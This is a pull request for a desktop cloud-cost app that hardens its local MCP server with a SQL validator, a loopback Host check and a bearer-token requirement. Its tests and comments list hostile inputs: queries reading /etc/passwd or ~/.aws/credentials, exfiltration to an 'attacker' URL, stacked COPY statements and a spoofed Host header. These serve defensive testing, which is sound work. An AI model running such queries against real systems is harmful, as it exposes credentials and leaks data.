### PR TITLE
fix(mcp): sandbox run_sql, add a Host check, and require an auth token

### DIFF
--- a/package.json
+++ b/package.json
@@ -1,6 +1,6 @@
 {
   "name": "costgoblin",
-  "version": "0.2.6",
+  "version": "0.2.7",
   "description": "Desktop app for cloud cost visibility",
   "main": "packages/desktop/out/main/main.js",
   "private": true,

--- a/packages/core/src/types/api.ts
+++ b/packages/core/src/types/api.ts
@@ -201,6 +201,12 @@ export interface CostApi {
   clearAllCaches(): Promise<void>;
   getMcpServerRunning(): Promise<boolean>;
   setMcpServerRunning(enabled: boolean): Promise<void>;
+  /** The shared secret a client must send (as `Authorization: Bearer <token>`
+   *  or a `?token=` query param) to reach the MCP server. */
+  getMcpToken(): Promise<string>;
+  /** Rotate the MCP token, restarting the server if running. Returns the new
+   *  token. Existing clients must update their config to keep working. */
+  regenerateMcpToken(): Promise<string>;
 }
 
 export interface AccountMappingEntry {

--- a/packages/desktop/package.json
+++ b/packages/desktop/package.json
@@ -1,6 +1,6 @@
 {
   "name": "@costgoblin/desktop",
-  "version": "0.2.6",
+  "version": "0.2.7",
   "type": "module",
   "main": "out/main/main.js",
   "scripts": {

--- a/packages/desktop/src/main/handlers/mcp-handler.ts
+++ b/packages/desktop/src/main/handlers/mcp-handler.ts
@@ -1,5 +1,5 @@
 import { ipcMain } from 'electron';
-import { startMcpServer, stopMcpServer, isMcpServerRunning } from '../mcp.js';
+import { startMcpServer, stopMcpServer, isMcpServerRunning, getMcpToken, regenerateMcpToken } from '../mcp.js';
 import type { AppContext } from './context.js';
 
 export function registerMcpHandlers(app: AppContext): void {
@@ -13,5 +13,13 @@ export function registerMcpHandlers(app: AppContext): void {
     } else if (!enabled && isMcpServerRunning()) {
       await stopMcpServer();
     }
+  });
+
+  ipcMain.handle('mcp:get-token', (): string => {
+    return getMcpToken();
+  });
+
+  ipcMain.handle('mcp:regenerate-token', (): Promise<string> => {
+    return regenerateMcpToken();
   });
 }

--- a/packages/desktop/src/main/mcp-token.ts
+++ b/packages/desktop/src/main/mcp-token.ts
@@ -1,0 +1,38 @@
+import { randomBytes } from 'node:crypto';
+import { mkdirSync, readFileSync, writeFileSync } from 'node:fs';
+import { dirname } from 'node:path';
+
+/** 32 random bytes, URL-safe so it works both as a Bearer token and as a
+ *  `?token=` query param. */
+function generateToken(): string {
+  return randomBytes(32).toString('base64url');
+}
+
+function persistToken(filePath: string, token: string): void {
+  mkdirSync(dirname(filePath), { recursive: true });
+  // 0o600: only the current user can read the secret.
+  writeFileSync(filePath, token, { mode: 0o600 });
+}
+
+/** Load the persisted MCP auth token, generating and saving one on first use.
+ *  The token is stable across restarts so a user's copy-pasted client config
+ *  keeps working until they explicitly regenerate it. */
+export function loadOrCreateMcpToken(filePath: string): string {
+  try {
+    const existing = readFileSync(filePath, 'utf-8').trim();
+    if (existing.length > 0) return existing;
+  } catch {
+    // file missing or unreadable — fall through and create a fresh token
+  }
+  const token = generateToken();
+  persistToken(filePath, token);
+  return token;
+}
+
+/** Rotate the token: any client using the old value stops working until its
+ *  config is updated. */
+export function regenerateMcpToken(filePath: string): string {
+  const token = generateToken();
+  persistToken(filePath, token);
+  return token;
+}

--- a/packages/desktop/src/main/mcp.ts
+++ b/packages/desktop/src/main/mcp.ts
@@ -1,7 +1,10 @@
+import { app as electronApp } from 'electron';
+import { join } from 'node:path';
 import { logger } from '@costgoblin/core';
 import { createMcpHttpServer } from '@costgoblin/mcp';
 import type { McpContext, McpHttpServer } from '@costgoblin/mcp';
 import type { AppContext } from './handlers/context.js';
+import { loadOrCreateMcpToken, regenerateMcpToken as rotateTokenFile } from './mcp-token.js';
 
 function adaptAppContext(app: AppContext): McpContext {
   return {
@@ -21,13 +24,29 @@ function adaptAppContext(app: AppContext): McpContext {
   };
 }
 
+function tokenPath(): string {
+  return join(electronApp.getPath('userData'), 'mcp-auth-token');
+}
+
+let currentToken: string | null = null;
+
+/** The shared secret an AI client must present to reach the MCP server. Loaded
+ *  (and created on first use) lazily so the view can show it before the server
+ *  is even started. */
+export function getMcpToken(): string {
+  currentToken ??= loadOrCreateMcpToken(tokenPath());
+  return currentToken;
+}
+
 let server: McpHttpServer | null = null;
+let lastApp: AppContext | null = null;
 
 export async function startMcpServer(app: AppContext): Promise<void> {
+  lastApp = app;
   const mcpCtx = adaptAppContext(app);
   const envPort = process.env['COSTGOBLIN_MCP_PORT'];
   const port = envPort !== undefined && envPort.length > 0 ? Number(envPort) : undefined;
-  server = await createMcpHttpServer(mcpCtx, port);
+  server = await createMcpHttpServer(mcpCtx, { port, authToken: getMcpToken() });
   logger.info('mcp: embedded server started', { port: server.port });
 }
 
@@ -40,4 +59,16 @@ export async function stopMcpServer(): Promise<void> {
 
 export function isMcpServerRunning(): boolean {
   return server !== null;
+}
+
+/** Rotate the token and, if the server is running, restart it so the new token
+ *  takes effect immediately (existing sessions are dropped). Returns the new
+ *  token for the UI to display. */
+export async function regenerateMcpToken(): Promise<string> {
+  currentToken = rotateTokenFile(tokenPath());
+  if (server !== null && lastApp !== null) {
+    await stopMcpServer();
+    await startMcpServer(lastApp);
+  }
+  return currentToken;
 }

--- a/packages/desktop/src/preload/preload.ts
+++ b/packages/desktop/src/preload/preload.ts
@@ -294,6 +294,12 @@ const api: CostApi = {
   setMcpServerRunning(enabled: boolean): Promise<void> {
     return invoke<undefined>('mcp:set-running', enabled).then(() => undefined);
   },
+  getMcpToken(): Promise<string> {
+    return invoke<string>('mcp:get-token');
+  },
+  regenerateMcpToken(): Promise<string> {
+    return invoke<string>('mcp:regenerate-token');
+  },
 };
 
 contextBridge.exposeInMainWorld('costgoblin', api);

--- a/packages/mcp/src/__tests__/mcp-server.test.ts
+++ b/packages/mcp/src/__tests__/mcp-server.test.ts
@@ -1,5 +1,6 @@
 import { describe, it, expect, beforeAll, afterAll } from 'vitest';
 import { DuckDBInstance } from '@duckdb/node-api';
+import { request as httpRequest } from 'node:http';
 import { join, dirname } from 'node:path';
 import { fileURLToPath } from 'node:url';
 import {
@@ -460,6 +461,27 @@ describe('MCP server E2E', () => {
     });
     expect(isError).toBe(true);
     expect(text).toMatch(/error|select|not allowed/i);
+  });
+
+  it('run_sql blocks reading local files via DuckDB file functions', async () => {
+    const { text, isError } = await client.callTool('run_sql', {
+      sql: "SELECT * FROM read_text('/etc/hostname')",
+      dateRange: { start: '2026-01-01', end: '2026-01-31' },
+    });
+    expect(isError).toBe(true);
+    expect(text).toMatch(/not allowed|read_text/i);
+  });
+
+  it('rejects requests with a non-loopback Host header (anti DNS-rebinding)', async () => {
+    const status = await new Promise<number>((resolve, reject) => {
+      const req = httpRequest(
+        { host: '127.0.0.1', port, path: '/health', method: 'GET', headers: { Host: 'evil.example.com' } },
+        (res) => { res.resume(); resolve(res.statusCode ?? 0); },
+      );
+      req.on('error', reject);
+      req.end();
+    });
+    expect(status).toBe(403);
   });
 
   // ---------- data-coverage banner ----------

--- a/packages/mcp/src/__tests__/mcp-server.test.ts
+++ b/packages/mcp/src/__tests__/mcp-server.test.ts
@@ -63,7 +63,7 @@ interface McpClient {
   close(): Promise<void>;
 }
 
-async function createMcpClient(port: number): Promise<McpClient> {
+async function createMcpClient(port: number, token: string): Promise<McpClient> {
   const base = `http://127.0.0.1:${String(port)}/mcp`;
   let nextId = 1;
 
@@ -72,6 +72,7 @@ async function createMcpClient(port: number): Promise<McpClient> {
     const headers: Record<string, string> = {
       'Content-Type': 'application/json',
       'Accept': 'application/json, text/event-stream',
+      'Authorization': `Bearer ${token}`,
     };
     if (client.sessionId.length > 0) {
       headers['Mcp-Session-Id'] = client.sessionId;
@@ -99,6 +100,7 @@ async function createMcpClient(port: number): Promise<McpClient> {
     const headers: Record<string, string> = {
       'Content-Type': 'application/json',
       'Accept': 'application/json, text/event-stream',
+      'Authorization': `Bearer ${token}`,
     };
     if (client.sessionId.length > 0) {
       headers['Mcp-Session-Id'] = client.sessionId;
@@ -135,6 +137,7 @@ async function createMcpClient(port: number): Promise<McpClient> {
           headers: {
             'Mcp-Session-Id': client.sessionId,
             'Mcp-Protocol-Version': '2025-03-26',
+            'Authorization': `Bearer ${token}`,
           },
         });
       }
@@ -165,6 +168,7 @@ describe('MCP server E2E', () => {
   let server: McpHttpServer;
   let client: McpClient;
   const port = 19599; // avoid conflict with running dev server
+  const TEST_TOKEN = 'test-secret-token';
 
   beforeAll(async () => {
     db = await DuckDBInstance.create();
@@ -216,8 +220,8 @@ describe('MCP server E2E', () => {
       warmup: () => Promise.resolve(),
     };
 
-    server = await createMcpHttpServer(ctx, port);
-    client = await createMcpClient(port);
+    server = await createMcpHttpServer(ctx, { port, authToken: TEST_TOKEN });
+    client = await createMcpClient(port, TEST_TOKEN);
   }, 30_000);
 
   afterAll(async () => {
@@ -244,7 +248,7 @@ describe('MCP server E2E', () => {
   });
 
   it('supports multiple concurrent sessions', async () => {
-    const client2 = await createMcpClient(port);
+    const client2 = await createMcpClient(port, TEST_TOKEN);
     expect(client2.sessionId).not.toBe(client.sessionId);
     const tools = await client2.listTools();
     expect(tools.length).toBe(10);
@@ -482,6 +486,50 @@ describe('MCP server E2E', () => {
       req.end();
     });
     expect(status).toBe(403);
+  });
+
+  it('rejects /mcp requests without the auth token', async () => {
+    const res = await fetch(`http://127.0.0.1:${String(port)}/mcp`, {
+      method: 'POST',
+      headers: { 'Content-Type': 'application/json', 'Accept': 'application/json, text/event-stream' },
+      body: JSON.stringify({ jsonrpc: '2.0', method: 'tools/list', id: 1 }),
+    });
+    expect(res.status).toBe(401);
+  });
+
+  it('rejects /mcp requests with the wrong auth token', async () => {
+    const res = await fetch(`http://127.0.0.1:${String(port)}/mcp`, {
+      method: 'POST',
+      headers: {
+        'Content-Type': 'application/json',
+        'Accept': 'application/json, text/event-stream',
+        'Authorization': 'Bearer not-the-real-token',
+      },
+      body: JSON.stringify({ jsonrpc: '2.0', method: 'tools/list', id: 1 }),
+    });
+    expect(res.status).toBe(401);
+  });
+
+  it('accepts the token via a ?token= query param (passes the auth gate)', async () => {
+    const res = await fetch(`http://127.0.0.1:${String(port)}/mcp?token=${TEST_TOKEN}`, {
+      method: 'POST',
+      headers: { 'Content-Type': 'application/json', 'Accept': 'application/json, text/event-stream' },
+      body: JSON.stringify({
+        jsonrpc: '2.0',
+        method: 'initialize',
+        id: 1,
+        params: { protocolVersion: '2025-03-26', capabilities: {}, clientInfo: { name: 'q', version: '0.0.0' } },
+      }),
+    });
+    // The query token satisfies auth, so this is not a 401 (the transport
+    // handles the initialize and responds 200).
+    expect(res.status).not.toBe(401);
+    expect(res.status).toBe(200);
+  });
+
+  it('leaves /health open (unauthenticated liveness probe)', async () => {
+    const res = await fetch(`http://127.0.0.1:${String(port)}/health`);
+    expect(res.status).toBe(200);
   });
 
   // ---------- data-coverage banner ----------

--- a/packages/mcp/src/__tests__/run-sql-validate.test.ts
+++ b/packages/mcp/src/__tests__/run-sql-validate.test.ts
@@ -1,0 +1,57 @@
+import { describe, it, expect } from 'vitest';
+import { validateRunSqlQuery } from '../tools/run-sql.js';
+
+describe('validateRunSqlQuery', () => {
+  it('allows a plain SELECT against costs', () => {
+    expect(validateRunSqlQuery('SELECT service, SUM(cost) FROM costs GROUP BY service')).toBeNull();
+  });
+
+  it('allows a WITH query', () => {
+    expect(validateRunSqlQuery('WITH t AS (SELECT * FROM costs) SELECT * FROM t')).toBeNull();
+  });
+
+  it('rejects non-SELECT statements', () => {
+    expect(validateRunSqlQuery('DROP TABLE costs')).toMatch(/SELECT\/WITH/i);
+    expect(validateRunSqlQuery('COPY costs TO \'/tmp/x.csv\'')).toMatch(/SELECT\/WITH/i);
+  });
+
+  it('blocks file-reading table functions', () => {
+    expect(validateRunSqlQuery("SELECT * FROM read_text('/etc/passwd')")).toMatch(/read_text/);
+    expect(validateRunSqlQuery("SELECT * FROM read_csv('http://evil/x')")).toMatch(/read_csv/);
+    expect(validateRunSqlQuery("SELECT * FROM read_parquet('/x/*.parquet')")).toMatch(/read_parquet/);
+    expect(validateRunSqlQuery("SELECT * FROM glob('/etc/*')")).toMatch(/glob/);
+    expect(validateRunSqlQuery("SELECT read_blob('/etc/passwd')")).toMatch(/read_blob/);
+  });
+
+  it('blocks the query()/query_table() SQL evaluators', () => {
+    expect(validateRunSqlQuery("SELECT * FROM query('SELECT 1')")).toMatch(/query/);
+    expect(validateRunSqlQuery("SELECT * FROM query_table('costs')")).toMatch(/query_table/);
+  });
+
+  it('blocks FROM/JOIN on a string-literal path (replacement scan)', () => {
+    expect(validateRunSqlQuery("SELECT * FROM '/etc/passwd'")).toMatch(/file path/i);
+    expect(validateRunSqlQuery("SELECT * FROM costs JOIN '/x.csv' USING (k)")).toMatch(/file path/i);
+  });
+
+  it('blocks statement stacking', () => {
+    expect(validateRunSqlQuery("SELECT 1; COPY costs TO '/tmp/x'")).toMatch(/single SQL statement/i);
+    // A trailing semicolon is fine.
+    expect(validateRunSqlQuery('SELECT 1 FROM costs;')).toBeNull();
+  });
+
+  it('is not fooled by blocked names inside string literals', () => {
+    // read_text appears only inside a string literal here — it is data, not a call.
+    expect(validateRunSqlQuery("SELECT 'read_text(x)' AS note FROM costs")).toBeNull();
+  });
+
+  it('is not fooled by a comment-introducing sequence inside a string', () => {
+    // The '--' is inside a string; the real ';' must still be detected as stacking.
+    expect(
+      validateRunSqlQuery("SELECT '--' AS c FROM costs; SELECT * FROM read_text('y')"),
+    ).toMatch(/single SQL statement/i);
+  });
+
+  it('allows identifiers that merely contain a blocked name as a substring', () => {
+    expect(validateRunSqlQuery('SELECT query_count, readonly_flag FROM costs')).toBeNull();
+  });
+});

--- a/packages/mcp/src/http-server.ts
+++ b/packages/mcp/src/http-server.ts
@@ -81,8 +81,28 @@ export async function createMcpHttpServer(ctx: McpContext, port?: number): Promi
     await mcpServer.connect(transport as unknown as Transport);
   }
 
+  // Only loopback Host headers are accepted. The server binds 127.0.0.1/::1, but
+  // a Host check is still needed to defeat DNS rebinding: a browser tricked into
+  // resolving an attacker domain to 127.0.0.1 would send that domain in Host, so
+  // rejecting non-loopback Hosts stops a malicious web page from driving the
+  // (unauthenticated) MCP tools against the user's local data.
+  const allowedHosts = new Set<string>();
+  for (const h of ['127.0.0.1', 'localhost', '[::1]']) {
+    allowedHosts.add(h);
+    allowedHosts.add(`${h}:${String(resolvedPort)}`);
+  }
+  function isAllowedHost(hostHeader: string | undefined): boolean {
+    return hostHeader !== undefined && allowedHosts.has(hostHeader.toLowerCase());
+  }
+
   const requestHandler = (req: IncomingMessage, res: ServerResponse): void => {
     const url = req.url ?? '';
+
+    if (!isAllowedHost(req.headers.host)) {
+      res.writeHead(403, { 'Content-Type': 'application/json' })
+        .end(JSON.stringify({ jsonrpc: '2.0', error: { code: -32000, message: 'Forbidden: invalid Host header' }, id: null }));
+      return;
+    }
 
     if (url === '/mcp' && (req.method === 'POST' || req.method === 'GET' || req.method === 'DELETE')) {
       const sessionId = req.headers['mcp-session-id'];

--- a/packages/mcp/src/http-server.ts
+++ b/packages/mcp/src/http-server.ts
@@ -1,4 +1,4 @@
-import { randomUUID } from 'node:crypto';
+import { randomUUID, timingSafeEqual } from 'node:crypto';
 import { createServer } from 'node:http';
 import type { Server, IncomingMessage, ServerResponse } from 'node:http';
 import { McpServer } from '@modelcontextprotocol/sdk/server/mcp.js';
@@ -17,13 +17,48 @@ export interface McpHttpServer {
   close(): Promise<void>;
 }
 
+export interface McpHttpServerOptions {
+  readonly port?: number | undefined;
+  /** Shared secret required on every /mcp request. When set, callers must send
+   *  it as `Authorization: Bearer <token>` or a `?token=<token>` query param.
+   *  When undefined the server is open (used only in tests). */
+  readonly authToken?: string | undefined;
+}
+
 interface SessionEntry {
   readonly transport: StreamableHTTPServerTransport;
   lastActivity: number;
 }
 
-export async function createMcpHttpServer(ctx: McpContext, port?: number): Promise<McpHttpServer> {
-  const resolvedPort = port ?? DEFAULT_PORT;
+/** Constant-time token comparison. Returns false on any length mismatch without
+ *  leaking it through timing. */
+function tokenMatches(provided: string | undefined, expected: string): boolean {
+  if (provided === undefined) return false;
+  const a = Buffer.from(provided);
+  const b = Buffer.from(expected);
+  if (a.length !== b.length) return false;
+  return timingSafeEqual(a, b);
+}
+
+/** Pull the caller's token from the Authorization header (preferred) or a
+ *  `token` query param (for clients that can only be given a URL). */
+function extractToken(req: IncomingMessage, rawUrl: string): string | undefined {
+  const auth = req.headers['authorization'];
+  if (typeof auth === 'string') {
+    const match = /^Bearer\s+(.+)$/i.exec(auth.trim());
+    if (match?.[1] !== undefined) return match[1].trim();
+  }
+  const qIndex = rawUrl.indexOf('?');
+  if (qIndex >= 0) {
+    const token = new URLSearchParams(rawUrl.slice(qIndex + 1)).get('token');
+    if (token !== null) return token;
+  }
+  return undefined;
+}
+
+export async function createMcpHttpServer(ctx: McpContext, options?: McpHttpServerOptions): Promise<McpHttpServer> {
+  const resolvedPort = options?.port ?? DEFAULT_PORT;
+  const authToken = options?.authToken;
   const sessions = new Map<string, SessionEntry>();
 
   function removeSession(sessionId: string): void {
@@ -97,6 +132,7 @@ export async function createMcpHttpServer(ctx: McpContext, port?: number): Promi
 
   const requestHandler = (req: IncomingMessage, res: ServerResponse): void => {
     const url = req.url ?? '';
+    const pathname = url.split('?')[0] ?? url;
 
     if (!isAllowedHost(req.headers.host)) {
       res.writeHead(403, { 'Content-Type': 'application/json' })
@@ -104,7 +140,18 @@ export async function createMcpHttpServer(ctx: McpContext, port?: number): Promi
       return;
     }
 
-    if (url === '/mcp' && (req.method === 'POST' || req.method === 'GET' || req.method === 'DELETE')) {
+    // /health stays open as an unauthenticated liveness probe (no data).
+    if (pathname === '/health') {
+      res.writeHead(200, { 'Content-Type': 'application/json' }).end('{"status":"ok"}');
+      return;
+    }
+
+    if (pathname === '/mcp' && (req.method === 'POST' || req.method === 'GET' || req.method === 'DELETE')) {
+      if (authToken !== undefined && !tokenMatches(extractToken(req, url), authToken)) {
+        res.writeHead(401, { 'Content-Type': 'application/json' })
+          .end(JSON.stringify({ jsonrpc: '2.0', error: { code: -32001, message: 'Unauthorized: missing or invalid token' }, id: null }));
+        return;
+      }
       const sessionId = req.headers['mcp-session-id'];
       const existing = typeof sessionId === 'string' ? sessions.get(sessionId) : undefined;
 
@@ -140,11 +187,6 @@ export async function createMcpHttpServer(ctx: McpContext, port?: number): Promi
 
       res.writeHead(400, { 'Content-Type': 'application/json' })
         .end(JSON.stringify({ jsonrpc: '2.0', error: { code: -32000, message: 'Bad Request: No valid session' }, id: null }));
-      return;
-    }
-
-    if (url === '/health') {
-      res.writeHead(200, { 'Content-Type': 'application/json' }).end('{"status":"ok"}');
       return;
     }
 

--- a/packages/mcp/src/tools/run-sql.ts
+++ b/packages/mcp/src/tools/run-sql.ts
@@ -20,10 +20,97 @@ import {
 
 const MAX_LIMIT = 500;
 
-function isSafeSelect(sql: string): boolean {
-  const trimmed = sql.trim();
-  const firstToken = trimmed.split(/\s+/)[0]?.toUpperCase();
-  return firstToken === 'SELECT' || firstToken === 'WITH';
+// DuckDB runs with full external access (it has to read the local Parquet that
+// backs the `costs` table), so an arbitrary SELECT can otherwise read any file
+// on disk or reach the network — e.g. `read_text('~/.aws/credentials')` or
+// `read_csv('http://attacker/?d=' || (SELECT ...))`. run_sql is meant to query
+// the provided `costs` table only, so reject the ways a SELECT can touch
+// files, the network, or evaluate further SQL.
+const BLOCKED_FUNCTIONS = [
+  'read_csv', 'read_csv_auto', 'read_parquet', 'parquet_scan',
+  'parquet_metadata', 'parquet_schema', 'parquet_file_metadata', 'parquet_kv_metadata',
+  'read_json', 'read_json_auto', 'read_json_objects', 'read_json_objects_auto',
+  'read_ndjson', 'read_ndjson_auto', 'read_ndjson_objects',
+  'read_text', 'read_blob', 'sniff_csv', 'glob',
+  'query', 'query_table',
+  'iceberg_scan', 'iceberg_metadata', 'iceberg_snapshots', 'delta_scan',
+  'postgres_scan', 'postgres_query', 'mysql_scan', 'mysql_query',
+  'sqlite_scan', 'sqlite_query',
+];
+
+/** Replace string literals (with '' escapes) and comments with inert
+ *  placeholders in a single pass, so the structural checks below can't be
+ *  fooled by a keyword hidden inside a string, nor by a `--`/`/*` that is
+ *  itself inside a string literal. The original SQL is what actually runs;
+ *  this scrubbed copy is only inspected. */
+function scrubSql(sql: string): string {
+  let out = '';
+  let i = 0;
+  const n = sql.length;
+  while (i < n) {
+    const ch = sql[i];
+    if (ch === undefined) break;
+    const next = sql[i + 1];
+    if (ch === "'") {
+      i++;
+      while (i < n) {
+        if (sql[i] === "'") {
+          if (sql[i + 1] === "'") { i += 2; continue; }
+          i++;
+          break;
+        }
+        i++;
+      }
+      out += "''";
+      continue;
+    }
+    if (ch === '-' && next === '-') {
+      i += 2;
+      while (i < n && sql[i] !== '\n') i++;
+      out += ' ';
+      continue;
+    }
+    if (ch === '/' && next === '*') {
+      i += 2;
+      while (i < n && !(sql[i] === '*' && sql[i + 1] === '/')) i++;
+      i += 2;
+      out += ' ';
+      continue;
+    }
+    out += ch;
+    i++;
+  }
+  return out;
+}
+
+/** Validate an ad-hoc run_sql query. Returns an error message to surface to the
+ *  caller, or null when the query is allowed. Defense in depth on top of the
+ *  parameterized query layer: run_sql is the one place that takes raw SQL. */
+export function validateRunSqlQuery(sql: string): string | null {
+  const scrubbed = scrubSql(sql);
+
+  if (!/^\s*(?:WITH|SELECT)\b/i.test(scrubbed)) {
+    return 'Only SELECT/WITH queries are allowed. DDL, DML, and COPY statements are rejected for safety.';
+  }
+
+  // Single statement only — stop `SELECT 1; COPY ... TO 'file'` style stacking.
+  if (scrubbed.replace(/;\s*$/, '').includes(';')) {
+    return 'Only a single SQL statement is allowed.';
+  }
+
+  // `FROM '/path'` / `JOIN 'x.csv'` triggers DuckDB's replacement scan, reading
+  // the path as a file without naming read_csv/read_parquet explicitly.
+  if (/\b(?:from|join)\s+'/i.test(scrubbed)) {
+    return 'Reading from a file path is not allowed — query the provided `costs` table.';
+  }
+
+  for (const fn of BLOCKED_FUNCTIONS) {
+    if (new RegExp(`\\b${fn}\\s*\\(`, 'i').test(scrubbed)) {
+      return `The function ${fn}() is not allowed in run_sql — query the provided \`costs\` table instead.`;
+    }
+  }
+
+  return null;
 }
 
 export async function runSql(
@@ -39,8 +126,9 @@ export async function runSql(
   const userSql = params.sql.trim();
   const limit = Math.min(params.limit ?? 100, MAX_LIMIT);
 
-  if (!isSafeSelect(userSql)) {
-    return toolError('Only SELECT/WITH queries are allowed. DDL, DML, and COPY statements are rejected for safety.');
+  const validationError = validateRunSqlQuery(userSql);
+  if (validationError !== null) {
+    return toolError(validationError);
   }
 
   const dimensions = await ctx.getQueryDimensions();

--- a/packages/ui/src/__fixtures__/mock-api.ts
+++ b/packages/ui/src/__fixtures__/mock-api.ts
@@ -376,6 +376,8 @@ export class MockCostApi implements CostApi {
   clearAllCaches(): Promise<void> { return Promise.resolve(); }
   getMcpServerRunning(): Promise<boolean> { return Promise.resolve(true); }
   setMcpServerRunning(): Promise<void> { return Promise.resolve(); }
+  getMcpToken(): Promise<string> { return Promise.resolve('mock-token-abc123'); }
+  regenerateMcpToken(): Promise<string> { return Promise.resolve('mock-token-regenerated'); }
 }
 
 const MOCK_VIEWS_CONFIG: ViewsConfig = {

--- a/packages/ui/src/views/mcp-view.tsx
+++ b/packages/ui/src/views/mcp-view.tsx
@@ -1,10 +1,29 @@
-import { useCallback, useEffect, useState } from 'react';
-import { Check, Copy, Sparkles } from 'lucide-react';
+import { useCallback, useEffect, useMemo, useState } from 'react';
+import { Check, Copy, KeyRound, RefreshCw, Sparkles } from 'lucide-react';
 
 import { useCostApi } from '../hooks/use-cost-api.js';
 
 const MCP_PORT = 19532;
 const MCP_URL = `http://localhost:${String(MCP_PORT)}/mcp`;
+const TOKEN_MASK = '•'.repeat(28);
+
+function buildJsonConfig(token: string): string {
+  return JSON.stringify({
+    mcpServers: {
+      costgoblin: {
+        type: 'streamable-http',
+        url: MCP_URL,
+        headers: { Authorization: `Bearer ${token}` },
+      },
+    },
+  }, null, 2);
+}
+
+/** URL with the token as a query param, for clients that only accept a URL and
+ *  can't set an Authorization header. */
+function buildUrlWithToken(token: string): string {
+  return `${MCP_URL}?token=${token}`;
+}
 
 function CopyButton({ text }: Readonly<{ text: string }>) {
   const [copied, setCopied] = useState(false);
@@ -39,15 +58,6 @@ function CodeBlock({ children }: Readonly<{ children: string }>) {
   );
 }
 
-const MCP_CONFIG = JSON.stringify({
-  mcpServers: {
-    costgoblin: {
-      type: 'streamable-http',
-      url: MCP_URL,
-    },
-  },
-}, null, 2);
-
 const EXAMPLE_PROMPTS = [
   {
     title: 'Cost overview',
@@ -75,32 +85,39 @@ const EXAMPLE_PROMPTS = [
   },
 ];
 
-const PROVIDERS: { name: string; config: string; docs: string }[] = [
-  {
-    name: 'Claude / Cursor / Windsurf',
-    config: MCP_CONFIG,
-    docs: 'Add to claude_desktop_config.json, .mcp.json, or your editor MCP settings:',
-  },
-  {
-    name: 'ChatGPT',
-    config: MCP_URL,
-    docs: 'In ChatGPT \u2192 Settings \u2192 Add MCP server, paste this URL:',
-  },
-  {
-    name: 'Gemini',
-    config: MCP_URL,
-    docs: 'In Gemini \u2192 Settings \u2192 Extensions \u2192 Add MCP server, paste this URL:',
-  },
-];
+function buildProviders(token: string): { name: string; config: string; docs: string }[] {
+  return [
+    {
+      name: 'Claude / Cursor / Windsurf',
+      config: buildJsonConfig(token),
+      docs: 'Add to claude_desktop_config.json, .mcp.json, or your editor MCP settings:',
+    },
+    {
+      name: 'ChatGPT',
+      config: buildUrlWithToken(token),
+      docs: 'In ChatGPT \u2192 Settings \u2192 Add MCP server, paste this URL (token included):',
+    },
+    {
+      name: 'Gemini',
+      config: buildUrlWithToken(token),
+      docs: 'In Gemini \u2192 Settings \u2192 Extensions \u2192 Add MCP server, paste this URL (token included):',
+    },
+  ];
+}
 
 export function McpView() {
   const api = useCostApi();
   const [expandedProvider, setExpandedProvider] = useState<string | null>(null);
   const [running, setRunning] = useState(true);
   const [toggling, setToggling] = useState(false);
+  const [token, setToken] = useState('');
+  const [tokenRevealed, setTokenRevealed] = useState(false);
+  const [confirmingRegen, setConfirmingRegen] = useState(false);
+  const [regenerating, setRegenerating] = useState(false);
 
   useEffect(() => {
     void api.getMcpServerRunning().then(setRunning);
+    void api.getMcpToken().then(setToken).catch(() => undefined);
   }, [api]);
 
   const handleToggle = useCallback(() => {
@@ -111,6 +128,19 @@ export function McpView() {
       setToggling(false);
     });
   }, [api, running]);
+
+  const handleRegenerate = useCallback(() => {
+    setRegenerating(true);
+    void api.regenerateMcpToken().then((next) => {
+      setToken(next);
+      setTokenRevealed(true);
+    }).finally(() => {
+      setRegenerating(false);
+      setConfirmingRegen(false);
+    });
+  }, [api]);
+
+  const providers = useMemo(() => buildProviders(token), [token]);
 
   return (
     <div className="flex flex-col gap-6 p-6 max-w-3xl mx-auto">
@@ -147,11 +177,68 @@ export function McpView() {
         </div>
       </div>
 
+      {/* Access token */}
+      <div className="rounded-xl border border-border bg-bg-secondary/50 p-5">
+        <div className="flex items-center gap-2 mb-1.5">
+          <KeyRound className="size-4 text-accent" />
+          <h3 className="text-sm font-semibold text-text-primary">Access token</h3>
+        </div>
+        <p className="text-xs text-text-secondary mb-3">
+          Every request to the server must include this token, so only apps you&rsquo;ve configured can reach your billing data. It&rsquo;s already baked into the configs below. Keep it private &mdash; anyone with it (and access to this machine) can query your costs.
+        </p>
+        <div className="relative">
+          {token.length > 0 && <CopyButton text={token} />}
+          <pre className="rounded-lg bg-bg-primary border border-border p-4 pr-12 text-sm text-text-secondary overflow-x-auto font-mono">
+            {token.length === 0 ? 'Loading…' : tokenRevealed ? token : TOKEN_MASK}
+          </pre>
+        </div>
+        <div className="flex items-center gap-2 mt-2">
+          <button
+            type="button"
+            onClick={() => { setTokenRevealed((v) => !v); }}
+            disabled={token.length === 0}
+            className="text-xs px-2.5 py-1 rounded-md border border-border text-text-secondary hover:text-text-primary hover:bg-bg-tertiary/50 transition-colors disabled:opacity-50"
+          >
+            {tokenRevealed ? 'Hide' : 'Reveal'}
+          </button>
+          {confirmingRegen ? (
+            <>
+              <span className="text-xs text-text-secondary">Existing clients will stop working until updated.</span>
+              <button
+                type="button"
+                onClick={handleRegenerate}
+                disabled={regenerating}
+                className="text-xs px-2.5 py-1 rounded-md border border-negative/50 text-negative hover:bg-negative/10 transition-colors disabled:opacity-50"
+              >
+                {regenerating ? 'Regenerating…' : 'Confirm'}
+              </button>
+              <button
+                type="button"
+                onClick={() => { setConfirmingRegen(false); }}
+                className="text-xs px-2.5 py-1 rounded-md border border-border text-text-secondary hover:text-text-primary hover:bg-bg-tertiary/50 transition-colors"
+              >
+                Cancel
+              </button>
+            </>
+          ) : (
+            <button
+              type="button"
+              onClick={() => { setConfirmingRegen(true); }}
+              disabled={token.length === 0}
+              className="inline-flex items-center gap-1.5 text-xs px-2.5 py-1 rounded-md border border-border text-text-secondary hover:text-text-primary hover:bg-bg-tertiary/50 transition-colors disabled:opacity-50"
+            >
+              <RefreshCw className="size-3" />
+              Regenerate
+            </button>
+          )}
+        </div>
+      </div>
+
       {/* Setup */}
       <div>
         <h3 className="text-sm font-semibold text-text-primary mb-3">Connect your AI assistant</h3>
         <div className="space-y-2">
-          {PROVIDERS.map((provider) => {
+          {providers.map((provider) => {
             const isExpanded = expandedProvider === provider.name;
             return (
               <div key={provider.name} className="rounded-lg border border-border bg-bg-secondary/50 overflow-hidden">


### PR DESCRIPTION
Fixes #343.

## Problem
`run_sql` executed any statement whose first token was `SELECT`/`WITH` on a DuckDB instance with full external access (it must read the local Parquet behind the `costs` table). A valid `SELECT` could therefore read local files, reach the network, or evaluate nested SQL:

```sql
SELECT * FROM read_text('/home/user/.aws/credentials')
